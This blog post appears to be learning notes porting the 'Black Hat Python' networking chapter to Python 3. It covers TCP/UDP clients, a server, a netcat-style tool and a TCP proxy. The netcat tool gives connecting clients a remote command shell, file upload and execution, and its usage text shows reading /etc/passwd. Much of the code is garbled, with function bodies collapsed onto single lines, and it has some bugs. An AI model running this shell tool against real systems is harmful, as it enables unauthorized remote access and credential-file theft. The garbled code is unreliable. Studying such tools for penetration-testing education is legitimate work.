Python黑帽子--黑客与渗透测试编程之道 python3 实现代码

最近在看 Python黑帽子–黑客与渗透测试编程之道这本书发现这本书的代码实现都是使用python2 的于是我就想使用python3来实现缓慢更新中
python2版本有一个博主写的特别好这是链接 http://blog.csdn.net/u012763794/article/details/50612756 部分注释我使用的这位博主的而且这位博主的注释写的比我好我的注释写的很少
这位博主也也不错他对代码的每一个模块做了解释 http://blog.csdn.net/SKI_12/article/details/71152826
发现了一位用python3来实现的博主
https://my.oschina.net/oby/blog/804064#comment-list

TCP客户端
代码

import socket
target_host = "www.baidu.com"
target_port = 80
client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
client.connect((target_host,target_port))
aaa = "GET / HTTP/1.1\r\nHost:baidu.com\r\n\r\n"
client.send(str.encode(aaa))  #这里只需要注意 send在python3中 接收的是 bytes 只需要做一个转换就好
response = client.recv(4096)
print (bytes.decode(response))

UDP客户端
代码

import socket
target_host = '127.0.0.1'
terget_post =  12138
client = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
client.sendto(str.encode('sdsdsdsdsdsd'),(target_host,terget_post)) #和tcp一样在这里做一个转换
data, addr = client.recvfrom(4096)
print (data)

使用nc验证这里我就不贴验证的图了

TCP服务端
代码

import socket
import threading
bing_ip = '0.0.0.0'
bing_port = 12138
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bing_ip,bing_port))
server.listen(5)    #最大连接数
print ("[*] listen on %s:%d" % (bing_ip,bing_port))
def handle_client(client_socket):   #客户端处理进程request = client_socket.recv(1024)    print ("[*] Received: %s" % request)   #接受类型并打印client_socket.send(str.encode('ACK!'))client_socket.close()
while True:client,addr = server.accept()print ("[*] Accepted connection from: %s:%d" % (addr[0],addr[1]))client_handler = threading.Thread(target=handle_client,args=(client,))client_handler.start()

这里的验证可以使用之前的tcp客户段来验证

取代netcat
这个简直了由于python3 区分了str 和 bytes 所以有很多坑
这个我改了两个版本一个是只能在linux上可以正常使用的版本一个是兼容windows和linux的版本
兼容版我引入了一个新的第三方库 chardet 来判断字符编码

先贴linux版本

import sys
import socket
import getopt
import threading
import subprocess
listen = False
command = False
upload = False
execute = ""
target = ""
upload_destination = ""
port = ""
def run_command(command): #命令执行模块command = command.rstrip()try:print (command)output = subprocess.check_output(command, stderr = subprocess.STDOUT, shell = True )except:output = "Failed to execute command. \r\n"return output #返回执行的结果
def client_handler(client_socket):# 上传 命令执行相关功能 global uploadglobal executeglobal commandif len(upload_destination):file_buffer = ""while True:data = client_socket.recv(1024)if not data:breakelse:file_buffer += datatry:file_descriptor = open(upload_destination,"wb")file_descriptor.write(file_buffer)file_descriptor.close()client_socket.send(str.encode("Successfully saved file to %s\r\n" % upload_destination))except:client_socket.send(str.encode("Failed to save file to %s\r\n" % upload_destination))if len(execute):output = run_command(execute)client_socket.send(str.encode(output))if command:while True:client_socket.send(str.encode("<BHP:#>"))cmd_buffer = ""cmd_buffer = str.encode(cmd_buffer)while "\n" not in bytes.decode(cmd_buffer):cmd_buffer += client_socket.recv(1024)response = run_command(cmd_buffer)print (response)client_socket.send(response)
def server_loop(): #监听模块global targetif not len(target):target = "0.0.0.0"server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)server.bind((target,port))server.listen(5)while True:client_socket, addr = server.accept()client_thread = threading.Thread(target=client_handler,args=(client_socket,))client_thread.start()
def client_sender(buffer): #返回信息模块client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)try:client.connect((target,port))if len(buffer):client.send(str.encode(buffer))while True:recv_len = 1response = ""while recv_len:data = client.recv(4096)   #这时 data 为 bytes类型data = bytes.decode(data)  #这里需要转换为str 不然下面的 response += data 没法执行recv_len = len(data)response += dataif recv_len < 4096:breakprint (response)buffer = input("")buffer += "\n"client.send(str.encode(buffer))except Exception as e:print (e)print ("[*] Exception! Exiting.")client.close()
def  usage():print ("BHP Net Tool")print ()print ("Usage:netcat.py -t target_host -p port")print ("-l --listen                 - listen on [host]:[port] for incoming connections")print ("-e --execute=file_to_run    - -execute the given file upon receiving a connection")print ("-c --command                - initialize a commandshell")print ("-u --upload=destination     - upon receiving connection upload a file and write to [destination]")print ()print ()print ("Examples: ") print ("netcat.py -t 192.168.0.1 -p 5555 -l -c")print ("netcat.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe"  )print ("netcat.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd")print ("echo 'ABCDEFGHI' | python ./netcat.py -t 192.168.11.12 -p 135") sys.exit(0)
def main():global listenglobal portglobal executeglobal commandglobal upload_destinationglobal targetif not len(sys.argv[1:]):usage()try:opts, args = getopt.getopt(sys.argv[1:],"hle:t:p:cu",["help","listen","execute","port","command","upload"])except getopt.GetoptError as err:print (str(err))usage()for o,a in opts:if o in ("-h","-help"):usage()elif o in ("-l","--listen"):listen = Trueelif o in ("-e","--execute"):execute = aelif o in ("-c","--commandshell"):command = Trueelif o in ("-u","--upload"):upload_destination = aelif o in ("-t","--target"):target = aelif o in ("-p","--port"):port = int(a)else:assert False,"Unhandled Optin"if not listen and len(target) and port > 0:buffer = sys.stdin.read()client_sender(buffer)if listen:server_loop()
main()

linux版本和兼容版我的区别我会在代码中注明兼容版没有注释
代码

import sys
import socket
import getopt
import threading
import subprocess
from chardet import detect
listen = False
command = False
upload = False
execute = ""
target = ""
upload_destination = ""
port = ""
def run_command(command):command = command.rstrip()try:command = bytes.decode(command)print (command)output = subprocess.check_output(command, stderr = subprocess.STDOUT, shell = True )except Exception as b:print (b)output = "Failed to execute command. \r\n"return output
def client_handler(client_socket):global uploadglobal executeglobal commandif len(upload_destination):file_buffer = ""while True:data = client_socket.recv(1024)if not data:breakelse:file_buffer += datatry:file_descriptor = open(upload_destination,"wb")file_descriptor.write(file_buffer)file_descriptor.close()client_socket.send(str.encode("Successfully saved file to %s\r\n" % upload_destination))except:client_socket.send(str.encode("Failed to save file to %s\r\n" % upload_destination))if len(execute):output = run_command(execute)client_socket.send(str.encode(output))if command:while True:client_socket.send(str.encode("<BHP:#>"))cmd_buffer = ""cmd_buffer = str.encode(cmd_buffer)while "\n" not in bytes.decode(cmd_buffer):cmd_buffer += client_socket.recv(4096)response = run_command(cmd_buffer)bytestype = detect(response)if bytestype["encoding"] == "GB2312": #我在这里加了一个字符编码判断当编码为 gbk时 先解码 因为py3 默认是utf-8response = response.decode('gbk')response = str.encode(response)     client_socket.send(response)
def server_loop():global targetif not len(target):target = "0.0.0.0"server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)server.bind((target,port))server.listen(5)while True:client_socket, addr = server.accept()client_thread = threading.Thread(target=client_handler,args=(client_socket,))client_thread.start()
def client_sender(buffer):client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)try:client.connect((target,port))if len(buffer):client.send(str.encode(buffer))while True:recv_len = 1response = ""while recv_len:data = client.recv(4096)recv_len = len(data)data = bytes.decode(data)response += dataif recv_len < 4096:breakprint (response)buffer = input("")buffer += "\n"client.send(str.encode(buffer))except Exception as e:print (e)print ("[*] Exception! Exiting.")client.close()
def  usage():print ("BHP Net Tool")print ()print ("Usage:netcat.py -t target_host -p port")print ("-l --listen                 - listen on [host]:[port] for incoming connections")print ("-e --execute=file_to_run    - -execute the given file upon receiving a connection")print ("-c --command                - initialize a commandshell")print ("-u --upload=destination     - upon receiving connection upload a file and write to [destination]")print ()print ()print ("Examples: ") print ("netcat.py -t 192.168.0.1 -p 5555 -l -c")print ("netcat.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe"  )print ("netcat.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd")print ("echo 'ABCDEFGHI' | python ./netcat.py -t 192.168.11.12 -p 135") sys.exit(0)
def main():global listenglobal portglobal executeglobal commandglobal upload_destinationglobal targetif not len(sys.argv[1:]):usage()try:opts, args = getopt.getopt(sys.argv[1:],"hle:t:p:cu",["help","listen","execute","port","command","upload"])except getopt.GetoptError as err:print (str(err))usage()for o,a in opts:if o in ("-h","-help"):usage()elif o in ("-l","--listen"):listen = Trueelif o in ("-e","--execute"):execute = aelif o in ("-c","--commandshell"):command = Trueelif o in ("-u","--upload"):upload_destination = aelif o in ("-t","--target"):target = aelif o in ("-p","--port"):port = int(a)else:assert False,"Unhandled Optin"if not listen and len(target) and port > 0:buffer = sys.stdin.read()client_sender(buffer)if listen:server_loop()
main()

兼容版测试截图

usage()函数用于参数的说明帮助、当用户输入错误的参数时会输出相应的提示；

client_sender()函数用于与目标主机建立连接并交互数据直到没有更多的数据发送回来，然后等待用户下一步的输入并继续发送和接收数据，直到用户结束脚本运行；

server_loop()函数用于建立监听端口并实现多线程处理新的客户端；

run_command()函数用于执行命令，其中subprocess库提供多种与客户端程序交互的方法；

client_handler()函数用于实现文件上传、命令执行和与shell相关的功能，其中wb标识确保是以二进制的格式写入文件、从而确保上传和写入的二进制文件能够成功执行；

主函数main()中是先读取所有的命令行选项从而设置相应的变量，然后从标准输入中读取数据并通过网络发送数据，若需要交互式地发送数据需要发送CTRL-D以避免从标准输入中读取数据，若检测到listen参数为True则调用server_loop()函数准备处理下一步命令。

TCP代理

import sys
import socket
import threading
import binascii
def server_loop(local_host,local_port,remote_host,remote_port,receive_first):server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)try :server.bind((local_host,local_port))except :print ("[!!] Failed to listen on %s:%d"%(local_host,local_port))    print ("[!!] Check for other listening sockets or correct permissions.")  sys.exit(0)print ("[*] Listening on %s:%d"%(local_host,local_port))server.listen(5) #创建线程while True:client_socket, addr = server.accept()#打印出本地连接信息print ("[==>] Received incoming connection from %s:%d" % (addr[0],addr[1]))#开启一个线程与远程主机通信proxy_thread = threading.Thread(target=proxy_handler,args=(client_socket,remote_host,remote_port,receive_first))proxy_thread.start()
def main():if len(sys.argv[1:])!= 5:print ("Usage: ./proxy.py [localhost] [localport] [remotehost] [remoteport] [receive_first]")print ("Example: ./proxy.py 127.0.0.1 9000 10.12.132.1 9000 True")sys.exit(0)#本地监听local_host = sys.argv[1]local_port = int(sys.argv[2])#远程监听remote_host = sys.argv[3]remote_port = int(sys.argv[4])#告诉代理在发送给远程主机之前连接和接受数据receive_first =  'True' #sys.argv[5]if "True" in receive_first:receive_first = Trueelse:receive_first = False#现在设置好我们监听socketserver_loop(local_host,local_port,remote_host,remote_port,receive_first)
def proxy_handler(client_socket,remote_host,remote_port,receive_first):#连接远程主机remote_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)remote_socket.connect((remote_host,remote_port))#如果必要从远程主机接收数据if receive_first:     remote_buffer = receive_from(remote_socket)hexdump(remote_buffer)#发送给我们的响应处理 remote_buffer = response_handler(remote_buffer)if len(remote_buffer):print ("[<==] sending %d bytes to localhost." % len(remote_buffer))client_socket.send(str.encode(remote_buffer))#现在我们从本地循环读取数据，发送个远程主机和本地主机while True:#从本地读取数据local_buffer = receive_from(client_socket)if len(local_buffer):print ("[==>] Received %d bytes from localhost." % len(local_buffer))hexdump(local_buffer)#发送给我们的本地请求local_buffer = request_handler(local_buffer)#向远程主机发送数据remote_socket.send(local_buffer)print ("[==>] Sent to remote.")#接收相应数据remote_buffer = receive_from(remote_socket)if len(remote_buffer):print ("[<==] Received %d byte from remote." % len(remote_buffer))hexdump(remote_buffer)remote_buffer = response_handler(remote_buffer)client_socket.send(remote_buffer)print ("[<==] Sent localhost")#如两边都没有数据 关闭连接if not len(local_buffer) or not len(remote_buffer):client_socket.close()remote_socket.close()print ("[*] No more data. Closing connections")break
#十六进制导出函数
def hexdump(src, length=16):result = []# Python 3 renamed the unicode type to str, the old str type has been replaced by bytesdigits = 4 if isinstance(src, str) else 2# xrange() was renamed to range() in Python 3.for i in range(0, len(src), length):s = src[i:i+length]hexa = ' '.join(["%0*X" % (digits, (x))for x in s]) text = ''.join([chr(x) if 0x20 <= x < 0x7F else '.'for x in s])result.append( "%04X %-*s %s" % (i, length*(digits + 1), hexa, text) )print ('\n'.join(result))
def receive_from(connection):buffer = ""#超时时间connection.settimeout(2)try:# 持续从缓存中读取数据直到没有数据或者超时while True:data = connection.recv(4096)if not data:breakdata = bytes.decode(data)buffer += databuffer = str.encode(buffer)except :passreturn buffer
#对目标是远程主机的请求进行修改
def request_handler(buffer):#数据包修改return buffer
#对目标是本地主机的响应进行修改
def response_handler(buffer):#数据包修改return buffer
main()

这个花费时间最多的是 hexdump 模块。。。。最后写完了发现我写的好繁琐就直接使用这位博主的代码
https://my.oschina.net/oby/blog/804064#comment-list
待续。。。。。

Python黑帽子--黑客与渗透测试编程之道 python3 实现代码相关推荐

Python黑帽子黑客与渗透测试编程之道（七）第四章：Scapy:网络的掌控者
1 窃取Email认证代码: from scapy.all import *def packet_callback(packet):if packet[TCP].payload:mail_packe ...
Python黑帽子-黑客与渗透测试编程之道
Python黑帽子-黑客与渗透测试编程之道时间:2018年4月28日前言本文参考了两篇资料,优化补全了代码内容 giantbranch 的 Python黑帽子–黑客与渗透测试编程之道意闲的 ...
关于《Python黑帽子：黑客与渗透测试编程之道》的学习笔记
本篇文章是学习<Python黑帽子:黑客与渗透测试编程之道>的笔记,会持续地将书上的代码自己敲一遍,从而让自己对Python的安全编程有更多的了解,同时希望各位可以给给建议,不足之处太多了 ...
《Python黑帽子：黑客与渗透测试编程之道》读书笔记（三）：scapy——网络的掌控者
目录前言 1.窃取email认证 2.ARP缓存投毒 3.PCAP文件处理结语前言 <Python黑帽子:黑客与渗透测试编程之道>的读书笔记,会包括书中源码,并自己将其中一些改写成P ...
《Python黑帽子：黑客与渗透测试编程之道》读书笔记（九）：自动化攻击取证
目录前言 1.Volatility配置 2.抓取口令的哈希值 3.直接代码注入 4.插入shellcode 结语前言 <Python黑帽子:黑客与渗透测试编程之道>的读书笔记,会包括书 ...
《Python黑帽子：黑客与渗透测试编程之道》读书笔记（二）：原始套接字和流量嗅探
目录前言 1.Windows和Linux上的包嗅探 2.解码IP层 3.解码ICMP层 4.发现主机结语前言 <Python黑帽子:黑客与渗透测试编程之道>的读书笔记,会包括书中源码 ...
《Python黑帽子：黑客与渗透测试编程之道》读书笔记（四）：web攻击
目录前言 1.urllib2 2.开源web应用安装 3.破解目录和文件位置 4.破解HTML表格认证结语前言 <Python黑帽子:黑客与渗透测试编程之道>的读书笔记,会包括书中源 ...
《Python黑帽子：黑客与渗透测试编程之道》读书笔记（五）：扩展burp代理
目录前言 1.burp的fuzz脚本 2.burp中利用Bing服务 3.利用网站内容生成密码字典结语前言 <Python黑帽子:黑客与渗透测试编程之道>的读书笔记,会包括书中源码, ...
《Python黑帽子：黑客与渗透测试编程之道》 Web攻击
Web的套接字函数库:urllib2 一开始以urllib2.py命名脚本,在Sublime Text中运行会出错,纠错后发现是重名了,改过来就好: #!/usr/bin/python #coding ...

Python黑帽子--黑客与渗透测试编程之道 python3 实现代码

Python黑帽子--黑客与渗透测试编程之道 python3 实现代码相关推荐

最新文章

热门文章